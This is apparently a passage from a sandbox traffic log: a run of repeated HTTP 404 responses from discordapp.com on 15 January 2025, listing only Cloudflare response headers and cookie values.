_cfuvid=WFr1KfBjq9Knz3NC5yI71zRBSfZxl4HR0T1Uu54I3U0-1736950320239-0.0.1.1-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=NoneServer: cloudflareCF-RAY: 9026754d59a20f55-EWRalt-svc: h3=":443"; ma=86400
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 15 Jan 2025 14:12:05 GMTContent-Type: text/plain;charset=UTF-8Content-Length: 36Connection: closeSet-Cookie: __cf_bm=tJ_Dt1s.FaR7sebsGQG9T1dga_5uSZGScuJSsoU54a0-1736950325-1.0.1.1-xoyqadx7y8aN4bysCh4QVuy_EkFzbJ2Jx2ZyVP0xHq70zZQUWb7l_EJroXPVx0LJjlpGZwUQQo445hz_crZqtQ; path=/; expires=Wed, 15-Jan-25 14:42:05 GMT; domain=.discordapp.com; HttpOnly; SecureReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=PNbeupvhzUBpqMi9zYfYwlxkIgEsSaoRsJWjsqgt6hMBkmfGX97LpWE%2B19Nej9MFSxht%2FAShyH3BXP7INPJyxhdnOYenUr0hzMv401qdqVF14%2BJNW8bzfutMHbEF2DAkc3H37Q%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodpSet-Cookie: _cfuvid=gK7tyobMy9rF2ERoh0twUaZIiRTmlBwWtKc_6gPRCDs-1736950325890-0.0.1.1-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=NoneServer: cloudflareCF-RAY: 90267570bf137c69-EWRalt-svc: h3=":443"; ma=86400
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 15 Jan 2025 14:12:11 GMTContent-Type: text/plain;charset=UTF-8Content-Length: 36Connection: closeSet-Cookie: __cf_bm=YaRDOW1tJWp7PdGKXemHPainavY_5e5ixsMKEqzCs_M-1736950331-1.0.1.1-5OeU7iaeMgtmGiNoUPsljsXTdlE6hZb0dKSNIyB16MSuNWdDpqIBST41KhEAac7h6GoHP4.N3B988mV8_QQxzg; path=/; expires=Wed, 15-Jan-25 14:42:11 GMT; domain=.discordapp.com; HttpOnly; SecureReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=L3MSMPiZrGV%2FZqOIA4YyvwLvmg9fEhNMxsy%2BHM%2FhXXKTrWTMhU0ZnbwFIt%2FqKtXi1aUdeJz0v%2BmqdnbKRlGb%2BTyS8eiBqiw8hn7QBpAGtK5WcwnvIkplzyZviGAP8s7JtEI4cg%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodpSet-Cookie: _cfuvid=f8cva1hjscT0u9wY_vPme7Pbx8L7lrw6YdnkojPWRbI-1736950331503-0.0.1.1-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=NoneServer: cloudflareCF-RAY: 90267593cec10f3a-EWRalt-svc: h3=":443"; ma=86400
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 15 Jan 2025 14:12:17 GMTContent-Type: text/plain;charset=UTF-8Content-Length: 36Connection: closeSet-Cookie: __cf_bm=DqDPiRkqJd6rxXBTJqcS63.n4ufNRwOOR2_7Te.cC_Q-1736950337-1.0.1.1-VhAhCpzqesrqAu9kSzlqLjn0xiViRAfYKTnTMEC_y9q7mj1GBxhRHaE8WR50wFb9V30UOuTVwL68tDvgIBOr5g; path=/; expires=Wed, 15-Jan-25 14:42:17 GMT; domain=.discordapp.com; HttpOnly; SecureReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=tbGQ7tcBy2yfEWTtiPL%2FfKB1PGjOuUeE1N4xEJXUERrnRqEraxfkop8S9PDTCjn1iElOZGCLkHDqo5eNkXlUz0GxRU3xJBbtZtq8E5P49lBy9yDg0jfm3AH8JRQH1FilpVUfXA%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodpSet-Cookie: _cfuvid=4ulRCfuRjrEAHXUIh1sxktZ.IR.9pp8FY6SRWoy7FKU-1736950337158-0.0.1.1-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=NoneServer: cloudflareCF-RAY: 902675b72c6f4380-EWRalt-svc: h3=":443"; ma=86400
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 15 Jan 2025 14:12:22 GMTContent-Type: text/plain;charset=UTF-8Content-Length: 36Connection: closeSet-Cookie: __cf_bm=ryHKRJ8BTqX3zz24OPtrH0Fja5ozBSLPCFqPx_uE42s-1736950342-1.0.1.1-Cqu.1J8NE7yyOlUw01Z3NxEIOo1qmwVMR51YEvK4vNJYeMayQo58R8.dNVtvD1jjX_mjPv1t_W5.KoG2k5l0CA; path=/; expires=Wed, 15-Jan-25 14:42:22 GMT; domain=.discordapp.com; HttpOnly; SecureReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=6U9nPXnVsaxgTsniFdCeWUVNpJnGCCw8rd4w28vcqaO34gZzKhT7kl%2BZAIRBf%2BD4WhJaPIERH2xwPaTygbz94yxVGK3psdx4hN20UNXwFY%2Bw3IUMqZm2S8JUZ4ZyE048%2Brjanw%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodpSet-Cookie: _cfuvid=xENYmw6MdnpH3sGhf46vjltVtQCNXyPF5r6VOnWDIao-1736950342800-0.0.1.1-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=NoneServer: cloudflareCF-RAY: 902675da6baf0f55-EWRalt-svc: h3=":443"; ma=86400
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 15 Jan 2025 14:12:28 GMTContent-Type: text/plain;charset=UTF-8Content-Length: 36Connection: closeSet-Cookie: __cf_bm=LJSMEuIoxRaF3OIOkCd4VGz2Jw_JUh.Mv1ckWQOFTwM-1736950348-1.0.1.1-DviW1GMP_updWEer8hLtsQya_mKy_ZPYaw1BvQapHDlPH6ox3xLZbPU0V4TAR.q4zvI81NBMM_rYllz1jxOxfQ; path=/; expires=Wed, 15-Jan-25 14:42:28 GMT; domain=.discordapp.com; HttpOnly; SecureReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=6mLMk5fLSUGQGvHqmk46GLrEC1Zd6foOwe9l8ZK1DF3aZtbtv7do2NbUjJa3ZrFkFA1yXLVQmxW3xyVT4UkWvTE8w0B8l4Ft1HMaPDxVNH1d35CNmryB7wjizlPxbXF6gQf5pw%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodpSet-Cookie: _cfuvid=ZQdE8GnER6CrlF4v6ot6rg6zCv9YS3LhAqjGsqakHfo-1736950348453-0.0.1.1-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=NoneServer: cloudflareCF-RAY: 902675fd8d884384-EWRalt-svc: h3=":443"; ma=86400
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 15 Jan 2025 14:12:34 GMTContent-Type: text/plain;charset=UTF-8Content-Length: 36Connection: closeSet-Cookie: __cf_bm=hhngZ2qBPYSB8BkPyLZ2MnjJW2Du.BJqiosZ03AjJdM-1736950354-1.0.1.1-..HOBGZj9UjRUrJc.34SVt21mq5sd86so_fmSAVJdJsWWnCHK1_gy_X50HlnBTd.EVYKPcLKBcQwes6Qd9fOxg; path=/; expires=Wed, 15-Jan-25 14:42:34 GMT; domain=.discordapp.com; HttpOnly; SecureReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=NLXHpkaKC%2FIP17HdD3me65HDfbW7dzjTQHrtGKrbx9NeOObsOmH6%2FU2J2E8JFBteXZPEf3Iidz1gD4nrio7XOXSRUvq01oQRpmlA%2FwzvDW1JA4Xzgi9hn6IYJEeYAE%2Bt1Q7i%2Bg%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodpSet-Cookie: _cfuvid=pMjwYqk14OS7MRjaO8YhStMSETgNAIgT.4XixjzvjuU-1736950354079-0.0.1.1-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=NoneServer: cloudflareCF-RAY: 90267620e9f97c99-EWRalt-svc: h3=":443"; ma=86400
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 15 Jan 2025 14:12:39 GMTContent-Type: text/plain;charset=UTF-8Content-Length: 36Connection: closeSet-Cookie: __cf_bm=b1uK__Ku6uGK53epW5kop.IUCAGbK21PasdF6Vgite0-1736950359-1.0.1.1-QL0plcT1gpV9ehB.txNli4M8QhUSqn5pwPhFexmVPb1rfLXOEvsuK4EJkqFhPKXBBK1xehiH16S1v3PfhNH77g; path=/; expires=Wed, 15-Jan-25 14:42:39 GMT; domain=.discordapp.com; HttpOnly; SecureReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=xWIwUQyBBvDjw7lNeo42N0X9WatLx6kLumb2bQC2w9EG1%2Blc%2BzoLw%2BhxBWfZsBOloRHYcjfsIovNZut9jeLli%2Bil3tBXUW8auFbaoYdTRpG4T0G6ioElUDd%2Fjt1mOz9CYHMZXg%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodpSet-Cookie: _cfuvid=2yFIDIcyIeWCxEETYTR6PKvMMo1eW8O56i0WC5bOG_w-1736950359721-0.0.1.1-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=NoneServer: cloudflareCF-RAY: 9026764429084374-EWRalt-svc: h3=":443"; ma=86400
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 15 Jan 2025 14:12:45 GMTContent-Type: text/plain;charset=UTF-8Content-Length: 36Connection: closeSet-Cookie: __cf_bm=B48AXGaw7zMB81.MOaqTC2iil_qKMSFhNN4DoilpPbk-1736950365-1.0.1.1-JiGHSoXnItnIWMjr_ErbeVj_AaYAxJScHU6HzRnMZNJ.wIdljIzoLSlTN0wW.gaj1o0qLJTrvkYKModmxBfFnw; path=/; expires=Wed, 15-Jan-25 14:42:45 GMT; domain=.discordapp.com; HttpOnly; SecureReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=YhOrOGVpy4qfCSF%2FRrbZzDiKfEYKsw8rmtTfI%2FDN4aGBvhTebZZSWMpgOIbJr3qeFs0FbbUTO6uwEpAA0214KUobn8tpn2fV9EnJM3DDNoc8Esymn9RwPXbm%2FlfcDarjVwXWKA%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodpSet-Cookie: _cfuvid=onGQX0ZL4ZVyUFq2UCDOuXH1KukGw5CdyvYobdptsv0-1736950365389-0.0.1.1-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=NoneServer: cloudflareCF-RAY: 902676676b897cf6-EWRalt-svc: h3=":443"; ma=86400
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 15 Jan 2025 14:12:51 GMTContent-Type: text/plain;charset=UTF-8Content-Length: 36Connection: closeSet-Cookie: __cf_bm=eJ3wQK0zh7V8zQ4aBGDBiQ93H_yutNTcqXblB.9yc78-1736950371-1.0.1.1-1l1F1IPs_8HfCKIdPnNbisabiF1031VMf9Ok9pmFRKZ4.58Sn.AcsWxohKWHUzwVafGm1Htl8t.nvs9doQUaHg; path=/; expires=Wed, 15-Jan-25 14:42:51 GMT; domain=.discordapp.com; HttpOnly; SecureReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=8EfFxGKm82iYElgpZJuOll8INloKc72zUOI%2FsgqM%2B35dWfMRqqtolW%2BBR6FUTnzT4CW0DhpjROaFu9hccIKn6OCtaxmWNgM80dCLpVdIOB6IOxx76SyzsEjXG6bchMwOPY5ccg%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodpSet-Cookie: _cfuvid=xE4eOMIdalW5deOT.J6w6Ier.jGALHVBntw_vF94e1c-1736950371028-0.0.1.1-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=NoneServer: cloudflareCF-RAY: 9026768adf9e4373-EWRalt-svc: h3=":443"; ma=86400
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 15 Jan 2025 14:12:56 GMTContent-Type: text/plain;charset=UTF-8Content-Length: 36Connection: closeSet-Cookie: __cf_bm=yf0aBe99JX2GJq0cIRjxwVIMTqMyRnRZ9W4zAOmE_AY-1736950376-1.0.1.1-W1Zp78f9PCHusRItm8Mvjhayuhtr7uTd4KrTicgt1biXfHLk3fzypbgbtZtLpOlGy3OeA.VCt_s1mqGB.eyBMw; path=/; expires=Wed, 15-Jan-25 14:42:56 GMT; domain=.discordapp.com; HttpOnly; SecureReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=9HCFIZiUAAaSgDcrUcsGGKnSFhhFWAxsGUqYpk0YetdxBDlVfJt8ZsD1Qz3TJb1l%2BH%2FWZnhdziUWqKyVIpr5LWlu%2BxwtZoDlolEPukbxGYRdpiggov7YJZtitLGxppvpEsVl7Q%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodpSet-Cookie: _cfuvid=_uQ9HKJpeGHm.bAJrLC3U4yd4ElbmEp1W0uYLu5lPEw-1736950376658-0.0.1.1-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=NoneServer: cloudflareCF-RAY: 902676ae0c2a4241-EWRalt-svc: h3=":443"; ma=86400
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 15 Jan 2025 14:13:02 GMTContent-Type: text/plain;charset=UTF-8Content-Length: 36Connection: closeSet-Cookie: __cf_bm=f5v4AEhbwUSspuXsbxxlEaCOlN0m8egcb9KjnEghqr4-1736950382-1.0.1.1-CuxCv6ToqTQqZGzpOXYxD0jWIF0OXpVgb5.BCjels4Tus.BAcOvfrJVpwdSzaHQBFnK19qLYNpislIKmrpofpw; path=/; expires=Wed, 15-Jan-25 14:43:02 GMT; domain=.discordapp.com; HttpOnly; SecureReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=PjiMDn4PWP6Eco0SC0S3WS%2BGcGIRiKdiDLjd%2BfmzW2OzHJB5Jxet10Ac1jcTdqXBhg4QokM%2FGKiWf1Z9R0xsUJMAI%2FLYIBlUORqSpGJg3CXX4Qi4lU%2BbrqUGG4WMu0QSTAAVCQ%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodpSet-Cookie: _cfuvid=tj0icPvD0PI8aV0.ItDhR746.CPDRVOSMA9uc4AJGyQ-1736950382329-0.0.1.1-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=NoneServer: cloudflareCF-RAY: 902676d17a8eefa5-EWRalt-svc: h3=":443"; ma=86400
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 15 Jan 2025 14:13:07 GMTContent-Type: text/plain;charset=UTF-8Content-Length: 36Connection: closeSet-Cookie: __cf_bm=OrJNZCbWSMb9SB0qQPwOs2FXswPlBJCeDWojah4_R4c-1736950387-1.0.1.1-MmAClhyuIS_cGktaxPVRYcsbfnU3UtU769pg0ViLzZd3gP7PbXkDG5lBU2dE1VPqdSaZB7HTqTFTj5SaSv5Qlw; path=/; expires=Wed, 15-Jan-25 14:43:07 GMT; domain=.discordapp.com; HttpOnly; SecureReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=MiPYZhxtxH7ubmD%2BlFyPDyAd7IQKW7T61INysBX7cMtoI1vVPZL%2BzYO8rxHNUap2kXAkWd%2BdFK0itjvdfsWNvFQ7MPlXV%2FSSSnV%2BUKOismdH5nDrCefnMtr2Q3VRfR5ObZtCvA%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodpSet-Cookie: _cfuvid=zcKz.xAga93BfQpMGCM5upmtLM8Ct.zi7AWfPaBza0I-1736950387982-0.0.1.1-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=NoneServer: cloudflareCF-RAY: 902676f4b84842d5-EWRalt-svc: h3=":443"; ma=86400
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 15 Jan 2025 14:13:13 GMTContent-Type: text/plain;charset=UTF-8Content-Length: 36Connection: closeSet-Cookie: __cf_bm=MWg3LFq0v2YugdjbO5hpNb5vgoPPbJmrg4EtMPa47tM-1736950393-1.0.1.1-k5jGjwBZK2ziXwwurJMh6.3Tb5uMLbdOwDDHIk80hK3udzTTZwn5sUWY2B5lAtBNyvGgyOfSSjnQhT.TZiscdQ; path=/; expires=Wed, 15-Jan-25 14:43:13 GMT; domain=.discordapp.com; HttpOnly; SecureReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=8e4LeCSs4wu%2FWW7stEl%2FfM%2BFFM%2FkJE1fTeznJxiLDu4FodPj8HySRj4G13jY3IxOhtNQz4FlFX7%2BMSvPuAd6rsNskPgB7hrtmU4FiXgrGiY3tHJ1qnSLQbDHensVPfh3cF1M6g%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodpSet-Cookie: _cfuvid=CLqVvJ22dgCz1ImQdmtmtueZ77th_Jtazjc.mn0pixk-1736950393637-0.0.1.1-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=NoneServer: cloudflareCF-RAY: 902677182abdde93-EWRalt-svc: h3=":443"; ma=86400
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 15 Jan 2025 14:13:19 GMTContent-Type: text/plain;charset=UTF-8Content-Length: 36Connection: closeSet-Cookie: __cf_bm=cTSBNnlR6rG3uuE4tgTVEZIXqnNxFfm2ztZ9puyUZUA-1736950399-1.0.1.1-fQevXWuXsIXpBB_CLRE3yurKIbHNrFPpiBZScAySb4S4vVFQqb40GKgA3Eg3mEPaldsmt.6kryJ5hWGCb2beBw; path=/; expires=Wed, 15-Jan-25 14:43:19 GMT; domain=.discordapp.com; HttpOnly; SecureReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=hoE6baOahH6uFVVrzP1efB%2BtNP33dNhVC17s%2FL3IFWgeeLUSAu8nTmeHVtLXklUd%2FJFP1e9dN0CFEXtbDEg6fJLrUOR9mgjD%2BNboazweb5aiWIYV6ItHh7B0t8u%2BWPCDSIy74g%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodpSet-Cookie: _cfuvid=7IKtskEPAmWvLVIbiwf6w81ap2eNJvml54cVLl3ip90-1736950399298-0.0.1.1-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=NoneServer: cloudflareCF-RAY: 9026773b6f1143fa-EWRalt-svc: h3=":443"; ma=86400
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 15 Jan 2025 14:13:24 GMTContent-Type: text/plain;charset=UTF-8Content-Length: 36Connection: closeSet-Cookie: __cf_bm=ifxyyuCz9bdaEeLU9RIcp6_1ntObO2jx9whozIkyhrQ-1736950404-1.0.1.1-5Stp4Wg.SlgumtsOcxxpAiASs0n8U5Bfj_zz1mV0Aa3tMVTcjVlfZB2vPR7dDZVgrmuIOcb6jLffwxDM38hjjw; path=/; expires=Wed, 15-Jan-25 14:43:24 GMT; domain=.discordapp.com; HttpOnly; SecureReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=UCCGnr8E66ZORaqmQ1SIAIBSkoHETKiMrf1tFX%2Bhqsyv%2FDsry%2BSEkDUbOzdZ5HeEr7cw%2BrIfYiw8irsWwug6FUHvGyUyomY1sm8afmu%2BlNbx806L14sb%2Bjoe7yVehVrCCw2tHA%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodpSet-Cookie: _cfuvid=fD3yGNn_4mMvQMN8dEPq_.v2jZNI_OtFPq.HOZbU8Qw-1736950404927-0.0.1.1-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=NoneServer: cloudflareCF-RAY: 9026775ea981440b-EWRalt-svc: h3=":443"; ma=86400
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 15 Jan 2025 14:13:30 GMTContent-Type: text/plain;charset=UTF-8Content-Length: 36Connection: closeSet-Cookie: __cf_bm=gfFHpnvt.99RJzODScbH3OrSMxkE1DjlUgCaO1R1ffE-1736950410-1.0.1.1-CarQw.YE7c_lJs6v1S7Qf.IQC4Vo8X9u45fdqBMxXrPvw_oHLnawFltXckEOwiZtq39b8TT2lkGWdiIZTkSDAA; path=/; expires=Wed, 15-Jan-25 14:43:30 GMT; domain=.discordapp.com; HttpOnly; SecureReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=K9R8Kf%2FAFxrSBCFOPYVR3l5hBNOCn9ltbRzmH%2BoG%2FfjTh%2FwRfR%2F3%2FC%2BOCy0YOcI0ZVRLOKgmMICbVaiYqocchgGZq8lBVzOaJ5XjiMVYsL5cDlQCptm2CoNOl1xTPh3l2GdURA%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodpSet-Cookie: _cfuvid=IcBIhoyTGo2krQj3D77B3M8_mcR5cv2DvIZGaKoLodc-1736950410549-0.0.1.1-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=NoneServer: cloudflareCF-RAY: 90267781dc840c9e-EWRalt-svc: h3=":443"; ma=86400
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 15 Jan 2025 14:13:36 GMTContent-Type: text/plain;charset=UTF-8Content-Length: 36Connection: closeSet-Cookie: __cf_bm=rnFHOrbufp_lVdb.98Ps_aVEUqljGPjbnt5J8yJ9xaI-1736950416-1.0.1.1-XGi0683Jqf5LpbtTpILhJlG0NmcuEWIp4K4nrzuf44eOb_YJhsgm_ITPnT6Riu_AyC7lPwwQ35mKZm8mHZDJ8g; path=/; expires=Wed, 15-Jan-25 14:43:36 GMT; domain=.discordapp.com; HttpOnly; SecureReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=9vlvOFSTIVQIhVowvJ5%2FDgkScWknXIg%2F%2Flx7VNqKjn5Ejn%2B3W5FwQZHhBSyEupXOTQkjykVJOJztpvnRvBN1ITHHt0DNB9%2F0K6PGrtql6uty9uEqUYC44ege0mM4U%2BhZr0mM%2FQ%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodpSet-Cookie: _cfuvid=pjOk8aZ1J.5m45iUaz43BxjWI8q7pHntGn3t5AfYQmY-1736950416193-0.0.1.1-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=NoneServer: cloudflareCF-RAY: 902677a4fdf443d6-EWRalt-svc: h3=":443"; ma=86400
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 15 Jan 2025 14:13:41 GMTContent-Type: text/plain;charset=UTF-8Content-Length: 36Connection: closeSet-Cookie: __cf_bm=qhotn6BXr.eM5o9SfOH7KAX6SeFwIksUae9OWbkv6bM-1736950421-1.0.1.1-EsUQPZSvCQJM3h3f54Jq7Q6g.FdM_VReFZKBlw8N17az59i_Oqfx7yyauw4agN1jjX0tEuwmWdT4qk2yW_4nyw; path=/; expires=Wed, 15-Jan-25 14:43:41 GMT; domain=.discordapp.com; HttpOnly; SecureReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Iu84wdMMdULe5y2Ret%2Fxir0j5VFJNaYEZYzKr76MQ1YhCOGd77jfQKrf9Dv9yZwPRZhARR1VJAuKK3wpjbcxAc5q6v5hsHTVnB1hKkHmjOWrRHf7BSGozTq2EoVfZuLdahdcXg%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodpSet-Cookie: _cfuvid=hzreHT28j_QTBoXScGGrVuOcvxThrOO4QRjBzlLOqUQ-1736950421825-0.0.1.1-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=NoneServer: cloudflareCF-RAY: 902677c85913f5fa-EWRalt-svc: h3=":443"; ma=86400
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 15 Jan 2025 14:13:47 GMTContent-Type: text/plain;charset=UTF-8Content-Length: 36Connection: closeSet-Cookie: __cf_bm=jYbh0DhjCwKBP1.2YbKrZ5HIeNBrt8zEtd0hZgeoiDg-1736950427-1.0.1.1-voWwNknDNdnSpuv5HrYOm42e.IYAztjIE8MvhFQM_8uOaLi.HLY_gvrA_Q9l.TumcbJwIpFMk6vWoZb3brxFSA; path=/; expires=Wed, 15-Jan-25 14:43:47 GMT; domain=.discordapp.com; HttpOnly; SecureReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=tWeRUDeaaxgXpTPNczYcRFbtZCzicHn9PJKkjMcCNsOpVyt1vlMli3wTB5gedM1L%2BQP6ioBoHaqbiF2d3ZLaA6nt7oyMB1Ag4uhRR6%2FLwg5KBjVRMwhZh%2FOiCTxmJX1hyVrjMw%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodpSet-Cookie: _cfuvid=PVxzUNfkGGFmoszDK3Co.3JVonI.J_t1irJZbDulMaM-1736950427453-0.0.1.1-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=NoneServer: cloudflareCF-RAY: 902677eb8bd14380-EWRalt-svc: h3=":443"; ma=86400
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 15 Jan 2025 14:13:53 GMTContent-Type: text/plain;charset=UTF-8Content-Length: 36Connection: closeSet-Cookie: __cf_bm=PR1ncd85LR7bvw64qWwJAQ82.k.8T4yc8_NLL1wJl9k-1736950433-1.0.1.1-568Qmg4txlxlYLLIgA5BeHeWsePCTyf6.eRJ6Ry7822JABDIU72scyH9QLOkGDgtPi.b0tttUlVVE_7yyBkRTQ; path=/; expires=Wed, 15-Jan-25 14:43:53 GMT; domain=.discordapp.com; HttpOnly; SecureReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=PCj%2Bb6H44TrRc6bSHFIlEB%2BqSJ9ESAlz%2FcnQS38mCZvyZJqK6dsz4UGvakO4xKAt8n0F%2B5dj69xKV2T6yCckTW0YNMrRoqqN9XxZ%2F9qK%2B23ujSyYt8liQzD8m30cGq5kovRzBQ%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodpSet-Cookie: _cfuvid=vp78_Z29A_hQegfxlSWsdPwYSNABPhu4qXcC2xmbm1E-1736950433109-0.0.1.1-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=NoneServer: cloudflareCF-RAY: 9026780ecfed17ad-EWRalt-svc: h3=":443"; ma=86400
